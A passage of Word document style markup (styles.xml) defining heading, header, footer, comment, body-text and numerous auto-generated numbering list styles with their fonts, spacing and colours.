      </w:tabs>
      <w:spacing w:before="240" w:after="60"/>
      <w:ind w:left="4320" w:hanging="720"/>
      <w:outlineLvl w:val="5"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading7">
    <w:name w:val="heading 7"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading7Char"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="0067018A"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="num" w:pos="5040"/>
      </w:tabs>
      <w:spacing w:before="240" w:after="60"/>
      <w:ind w:left="5040" w:hanging="720"/>
      <w:outlineLvl w:val="6"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading8">
    <w:name w:val="heading 8"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading8Char"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="0067018A"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="num" w:pos="5760"/>
      </w:tabs>
      <w:spacing w:before="240" w:after="60"/>
      <w:ind w:left="5760" w:hanging="720"/>
      <w:outlineLvl w:val="7"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading9">
    <w:name w:val="heading 9"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading9Char"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="001B2627"/>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40211"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HeaderChar">
    <w:name w:val="Header Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Header"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00F40211"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00F40211"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FooterChar">
    <w:name w:val="Footer Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Footer"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00F40211"/>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00F4021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F40211"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008C2611"/>
    <w:rPr>
      <w:color w:val="808080"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E6E6E6"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00A9320B"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="FollowedHyperlink">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00AE1678"/>
    <w:rPr>
      <w:color w:val="954F72" w:themeColor="followedHyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Caption">
    <w:name w:val="caption"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="35"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00262B68"/>
    <w:pPr>
      <w:spacing w:after="200"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="44546A" w:themeColor="text2"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="CommentReference">
    <w:name w:val="annotation reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00262B68"/>
    <w:rPr>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="CommentText">
    <w:name w:val="annotation text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="CommentTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00262B68"/>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CommentTextChar">
    <w:name w:val="Comment Text Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="CommentText"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00262B68"/>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="CommentSubject">
    <w:name w:val="annotation subject"/>
    <w:basedOn w:val="CommentText"/>
    <w:next w:val="CommentText"/>
    <w:link w:val="CommentSubjectChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00262B68"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CommentSubjectChar">
    <w:name w:val="Comment Subject Char"/>
    <w:basedOn w:val="CommentTextChar"/>
    <w:link w:val="CommentSubject"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00262B68"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BalloonText">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BalloonTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00262B6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62B68"/>
    <w:rPr>
      <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading3Char">
    <w:name w:val="Heading 3 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading3"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00CF74FA"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="1F3763" w:themeColor="accent1" w:themeShade="7F"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="PlainText">
    <w:name w:val="Plain Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="PlainTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00DA2044"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="PlainTextChar">
    <w:name w:val="Plain Text Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="PlainText"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00DA2044"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Default">
    <w:name w:val="Default"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00501CCD"/>
    <w:pPr>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:adjustRightInd w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="000000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Strong">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="00A27779"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NoSpacing">
    <w:name w:val="No Spacing"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rsid w:val="001E6E48"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading2"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="007E5822"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading1Char">
    <w:name w:val="Heading 1 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00C5000D"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00623AD1"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading9Char">
    <w:name w:val="Heading 9 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading9"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="001B2627"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading4Char">
    <w:name w:val="Heading 4 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading4"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="009C0516"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BodyText">
    <w:name w:val="Body Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BodyTextChar"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00631177"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:suppressAutoHyphens/>
      <w:spacing w:after="120"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
      <w:kern w:val="2"/>
      <w:lang w:eastAsia="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="BodyTextChar">
    <w:name w:val="Body Text Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="BodyText"/>
    <w:semiHidden/>
    <w:rsid w:val="00631177"/>
    <w:rPr>
      <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
      <w:kern w:val="2"/>
      <w:lang w:eastAsia="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="TableContents">
    <w:name w:val="Table Contents"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00631177"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:suppressLineNumbers/>
      <w:suppressAutoHyphens/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
      <w:kern w:val="2"/>
      <w:lang w:eastAsia="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTMLPreformatted">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HTMLPreformattedChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00955778"/>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955778"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="WW8Num2">
    <w:name w:val="WW8Num2"/>
    <w:rsid w:val="00226D82"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="NoList1">
    <w:name w:val="No List1"/>
    <w:next w:val="NoList"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00ED1CE5"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="NoList2">
    <w:name w:val="No List2"/>
    <w:next w:val="NoList"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00CE3107"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="NoList3">
    <w:name w:val="No List3"/>
    <w:next w:val="NoList"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B647B7"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="NoList11">
    <w:name w:val="No List11"/>
    <w:next w:val="NoList"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B647B7"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="WW8Num21">
    <w:name w:val="WW8Num21"/>
    <w:rsid w:val="00B647B7"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="NoList111">
    <w:name w:val="No List111"/>
    <w:next w:val="NoList"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B647B7"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="NoList21">
    <w:name w:val="No List21"/>
    <w:next w:val="NoList"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B647B7"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="NoList4">
    <w:name w:val="No List4"/>
    <w:next w:val="NoList"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00AE1160"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="NoList12">
    <w:name w:val="No List12"/>
    <w:next w:val="NoList"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00AE1160"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="WW8Num22">
    <w:name w:val="WW8Num22"/>
    <w:rsid w:val="00AE1160"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="1"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="NoList112">
    <w:name w:val="No List112"/>
    <w:next w:val="NoList"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00AE1160"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="NoList22">
    <w:name w:val="No List22"/>
    <w:next w:val="NoList"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00AE1160"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="NoList31">
    <w:name w:val="No List31"/>
    <w:next w:val="NoList"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00AE1160"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="WW8Num211">
    <w:name w:val="WW8Num211"/>
    <w:rsid w:val="00AE1160"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="NoList121">
    <w:name w:val="No List121"/>
    <w:next w:val="NoList"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00AE1160"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="NoList211">
    <w:name w:val="No List211"/>
    <w:next w:val="NoList"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00AE1160"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="NoList311">
    <w:name w:val="No List311"/>
    <w:next w:val="NoList"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00AE1160"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="NoList1111">
    <w:name w:val="No List1111"/>
    <w:next w:val="NoList"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00AE1160"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="WW8Num2111">
    <w:name w:val="WW8Num2111"/>
    <w:rsid w:val="00AE1160"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="NoList11111">
    <w:name w:val="No List11111"/>
    <w:next w:val="NoList"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00AE1160"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="NoList2111">
    <w:name w:val="No List2111"/>
    <w:next w:val="NoList"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00AE1160"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="NoList5">
    <w:name w:val="No List5"/>
    <w:next w:val="NoList"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00C32011"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="NoList13">
    <w:name w:val="No List13"/>
    <w:next w:val="NoList"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00C32011"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="WW8Num23">
    <w:name w:val="WW8Num23"/>
    <w:rsid w:val="00C32011"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="NoList113">
    <w:name w:val="No List113"/>
    <w:next w:val="NoList"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00C32011"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="NoList23">
    <w:name w:val="No List23"/>
    <w:next w:val="NoList"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00C32011"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="NoList32">
    <w:name w:val="No List32"/>
    <w:next w:val="NoList"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00C32011"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="WW8Num212">
    <w:name w:val="WW8Num212"/>
    <w:rsid w:val="00C32011"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="NoList122">
    <w:name w:val="No List122"/>
    <w:next w:val="NoList"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00C32011"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="NoList212">
    <w:name w:val="No List212"/>
    <w:next w:val="NoList"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00C32011"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="NoList312">
    <w:name w:val="No List312"/>
    <w:next w:val="NoList"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00C32011"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="NoList1112">
    <w:name w:val="No List1112"/>
    <w:next w:val="NoList"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00C32011"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="WW8Num2112">
    <w:name w:val="WW8Num2112"/>
    <w:rsid w:val="00C32011"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="NoList11112">
    <w:name w:val="No List11112"/>
    <w:next w:val="NoList"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00C32011"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="NoList2112">
    <w:name w:val="No List2112"/>
    <w:next w:val="NoList"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00C32011"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading5Char">
    <w:name w:val="Heading 5 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading5"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="00421E35"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:noProof/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="NoList6">
    <w:name w:val="No List6"/>
    <w:next w:val="NoList"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00421E35"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="NoList14">
    <w:name w:val="No List14"/>
    <w:next w:val="NoList"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00421E35"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="WW8Num24">
    <w:name w:val="WW8Num24"/>
    <w:rsid w:val="00421E35"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="NoList114">
    <w:name w:val="No List114"/>
    <w:next w:val="NoList"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00421E35"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="NoList24">
    <w:name w:val="No List24"/>
    <w:next w:val="NoList"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00421E35"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="NoList33">
    <w:name w:val="No List33"/>
    <w:next w:val="NoList"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00421E35"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="WW8Num213">
    <w:name w:val="WW8Num213"/>
    <w:rsid w:val="00421E35"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="NoList123">
    <w:name w:val="No List123"/>
    <w:next w:val="NoList"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00421E35"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="NoList213">
    <w:name w:val="No List213"/>
    <w:next w:val="NoList"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00421E35"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="NoList313">
    <w:name w:val="No List313"/>
    <w:next w:val="NoList"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00421E35"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="NoList1113">
    <w:name w:val="No List1113"/>
    <w:next w:val="NoList"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00421E35"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="WW8Num2113">
    <w:name w:val="WW8Num2113"/>
    <w:rsid w:val="00421E35"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="NoList11113">
    <w:name w:val="No List11113"/>
    <w:next w:val="NoList"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00421E35"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="NoList2113">
    <w:name w:val="No List2113"/>
    <w:next w:val="NoList"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00421E35"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="NoList41">
    <w:name w:val="No List41"/>
    <w:next w:val="NoList"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00421E35"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="WW8Num221">
    <w:name w:val="WW8Num221"/>
    <w:rsid w:val="00421E35"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="NoList131">
    <w:name w:val="No List131"/>
    <w:next w:val="NoList"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00421E35"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="NoList221">
    <w:name w:val="No List221"/>
